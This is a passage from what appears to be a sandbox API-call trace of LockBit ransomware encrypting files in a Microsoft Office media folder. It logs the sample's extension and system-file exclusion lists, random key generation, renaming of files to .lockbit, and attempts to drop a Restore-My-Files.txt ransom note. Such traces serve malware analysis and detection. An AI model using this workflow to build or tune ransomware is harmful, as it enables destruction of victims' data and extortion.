office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.970] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdadef00, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc978460, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xcdadef00, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0xa97, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14711_.GIF", cAlternateFileName="")) returned 1 [0205.970] lstrcmpiW (lpString1=".", lpString2="BD14711_.GIF") returned -1 [0205.970] lstrcmpiW (lpString1="..", lpString2="BD14711_.GIF") returned -1 [0205.970] PathFindExtensionW (pszPath="BD14711_.GIF") returned=".GIF" [0205.970] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.970] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.970] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.970] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.970] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.970] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.970] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.970] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.970] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.971] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.971] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.971] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.971] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.971] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.971] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.971] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.971] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.971] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.972] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.972] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.972] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.972] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.972] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.972] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.972] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.972] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.972] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.972] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14711_.GIF") returned 1 [0205.972] lstrcmpiW (lpString1="ntldr", lpString2="BD14711_.GIF") returned 1 [0205.972] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14711_.GIF") returned 1 [0205.972] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14711_.GIF") returned 1 [0205.972] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14711_.GIF") returned -1 [0205.972] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14711_.GIF") returned 1 [0205.972] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14711_.GIF") returned 1 [0205.972] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0205.972] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14711_.GIF") returned=".GIF" [0205.972] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.972] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.972] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.972] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.972] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.972] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.972] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.972] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.972] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.972] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.973] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.973] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.973] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.973] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.973] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.973] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.973] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.973] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.973] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.973] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.973] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.973] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.973] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.973] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.973] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.973] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.973] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.973] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.973] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14711_.GIF.lockbit") returned 76 [0205.973] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14711_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14711_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0205.975] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.975] malloc (_Size=0x40068) returned 0x3df0008 [0205.975] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2711) returned 1 [0205.975] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.976] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0205.976] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.976] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0205.976] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.978] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14711_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14711_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.978] malloc (_Size=0xae) returned 0x1fa2ed8 [0205.978] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0205.979] free (_Block=0x1fa2ed8) [0205.979] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14711_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0205.979] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0205.980] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.980] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2a26200, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc99e5c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xf2a26200, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0x1a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14768_.GIF", cAlternateFileName="")) returned 1 [0205.980] lstrcmpiW (lpString1=".", lpString2="BD14768_.GIF") returned -1 [0205.980] lstrcmpiW (lpString1="..", lpString2="BD14768_.GIF") returned -1 [0205.980] PathFindExtensionW (pszPath="BD14768_.GIF") returned=".GIF" [0205.980] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.980] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.980] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.980] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.980] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.980] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.980] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.980] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.980] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.980] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.980] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.980] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.980] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.980] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.980] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.980] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.980] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.981] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.981] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.981] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.981] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.981] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.981] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.982] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.982] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.982] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.982] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.982] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14768_.GIF") returned 1 [0205.982] lstrcmpiW (lpString1="ntldr", lpString2="BD14768_.GIF") returned 1 [0205.982] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14768_.GIF") returned 1 [0205.982] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14768_.GIF") returned 1 [0205.982] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14768_.GIF") returned -1 [0205.982] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14768_.GIF") returned 1 [0205.982] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14768_.GIF") returned 1 [0205.982] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0205.982] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14768_.GIF") returned=".GIF" [0205.982] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.982] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.982] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.982] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.982] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.982] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.982] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.982] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.982] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.982] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.982] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.982] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.983] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.983] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.983] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.983] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.983] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.983] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.983] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.983] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.983] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.983] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.983] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.983] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.983] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.983] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.983] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.983] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.983] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14768_.GIF.lockbit") returned 76 [0205.983] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14768_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14768_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0205.985] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.985] malloc (_Size=0x40068) returned 0x1ff1e60 [0205.985] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=423) returned 1 [0205.985] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.985] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0205.985] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.986] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0205.986] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0205.987] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14768_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14768_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.987] malloc (_Size=0xae) returned 0x1fa2ed8 [0205.987] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0205.988] free (_Block=0x1fa2ed8) [0205.988] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14768_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0205.988] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0205.988] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.988] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2a26200, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc99e5c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xf2a26200, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14769_.GIF", cAlternateFileName="")) returned 1 [0205.988] lstrcmpiW (lpString1=".", lpString2="BD14769_.GIF") returned -1 [0205.988] lstrcmpiW (lpString1="..", lpString2="BD14769_.GIF") returned -1 [0205.988] PathFindExtensionW (pszPath="BD14769_.GIF") returned=".GIF" [0205.989] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.989] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.989] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.989] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.989] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.989] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.989] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.989] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.989] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.989] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.989] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.989] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.989] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.989] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.989] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.989] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.989] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.989] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.989] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.989] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.989] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.989] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.989] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.989] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.989] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.989] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.989] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.989] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.989] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.990] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.990] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.990] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.990] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.990] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.990] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.990] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.990] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.990] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.990] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.990] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.990] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.990] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.990] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.990] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.990] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.990] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.990] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.990] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14769_.GIF") returned 1 [0205.990] lstrcmpiW (lpString1="ntldr", lpString2="BD14769_.GIF") returned 1 [0205.990] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14769_.GIF") returned 1 [0205.990] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14769_.GIF") returned 1 [0205.990] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14769_.GIF") returned -1 [0205.990] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14769_.GIF") returned 1 [0205.990] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14769_.GIF") returned 1 [0205.990] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0205.990] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14769_.GIF") returned=".GIF" [0205.990] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.990] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.991] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.991] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.991] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.991] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.991] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.991] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.991] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.991] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.991] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.991] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 